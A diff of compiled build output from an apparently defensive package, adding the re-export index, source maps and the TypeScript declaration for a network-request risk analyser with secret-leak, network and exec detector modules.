UAAU,EAAE,SAAS;QACrB,SAAS,EAAE,QAAQ;QACnB,QAAQ;QACR,YAAY,EAAE,WAAW;QACzB,YAAY,EAAE,WAAW;KAC1B,CAAC;AACJ,CAAC"}

package/dist/action/detectors/index.d.ts ADDED Viewed

@@ -0,0 +1,4 @@
+export * from './secret-leak.js';
+export * from './network.js';
+export * from './exec.js';
+//# sourceMappingURL=index.d.ts.map

package/dist/action/detectors/index.d.ts.map ADDED Viewed

	@@ -0,0 +1 @@
1	+ {"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../../src/action/detectors/index.ts"],"names":[],"mappings":"AAAA,cAAc,kBAAkB,CAAC;AACjC,cAAc,cAAc,CAAC;AAC7B,cAAc,WAAW,CAAC"}

package/dist/action/detectors/index.js ADDED Viewed

@@ -0,0 +1,20 @@
+"use strict";
+var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    var desc = Object.getOwnPropertyDescriptor(m, k);
+    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
+      desc = { enumerable: true, get: function() { return m[k]; } };
+    }
+    Object.defineProperty(o, k2, desc);
+}) : (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    o[k2] = m[k];
+}));
+var __exportStar = (this && this.__exportStar) || function(m, exports) {
+    for (var p in m) if (p !== "default" && !Object.prototype.hasOwnProperty.call(exports, p)) __createBinding(exports, m, p);
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+__exportStar(require("./secret-leak.js"), exports);
+__exportStar(require("./network.js"), exports);
+__exportStar(require("./exec.js"), exports);
+//# sourceMappingURL=index.js.map

package/dist/action/detectors/index.js.map ADDED Viewed

	@@ -0,0 +1 @@
1	+ {"version":3,"file":"index.js","sourceRoot":"","sources":["../../../src/action/detectors/index.ts"],"names":[],"mappings":";;;;;;;;;;;;;;;;AAAA,mDAAiC;AACjC,+CAA6B;AAC7B,4CAA0B"}

package/dist/action/detectors/network.d.ts ADDED Viewed

@@ -0,0 +1,21 @@
+import type { NetworkRequestData, ActionEvidence } from '../../types/action.js';
+/**
+ * Network request analysis result
+ */
+export interface NetworkAnalysisResult {
+    /** Risk level */
+    risk_level: 'low' | 'medium' | 'high' | 'critical';
+    /** Risk tags */
+    risk_tags: string[];
+    /** Evidence */
+    evidence: ActionEvidence[];
+    /** Should block */
+    should_block: boolean;
+    /** Block reason */
+    block_reason?: string;
+}
+/**
+ * Analyze a network request for security risks
+ */
+export declare function analyzeNetworkRequest(request: NetworkRequestData, allowlist?: string[]): NetworkAnalysisResult;
+//# sourceMappingURL=network.d.ts.map

package/dist/action/detectors/network.d.ts.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"file":"network.d.ts","sourceRoot":"","sources":["../../../src/action/detectors/network.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,kBAAkB,EAAE,cAAc,EAAE,MAAM,uBAAuB,CAAC;AAIhF;;GAEG;AACH,MAAM,WAAW,qBAAqB;IACpC,iBAAiB;IACjB,UAAU,EAAE,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;IACnD,gBAAgB;IAChB,SAAS,EAAE,MAAM,EAAE,CAAC;IACpB,eAAe;IACf,QAAQ,EAAE,cAAc,EAAE,CAAC;IAC3B,mBAAmB;IACnB,YAAY,EAAE,OAAO,CAAC;IACtB,mBAAmB;IACnB,YAAY,CAAC,EAAE,MAAM,CAAC;CACvB;AAmCD;;GAEG;AACH,wBAAgB,qBAAqB,CACnC,OAAO,EAAE,kBAAkB,EAC3B,SAAS,GAAE,MAAM,EAAO,GACvB,qBAAqB,CA6HvB"}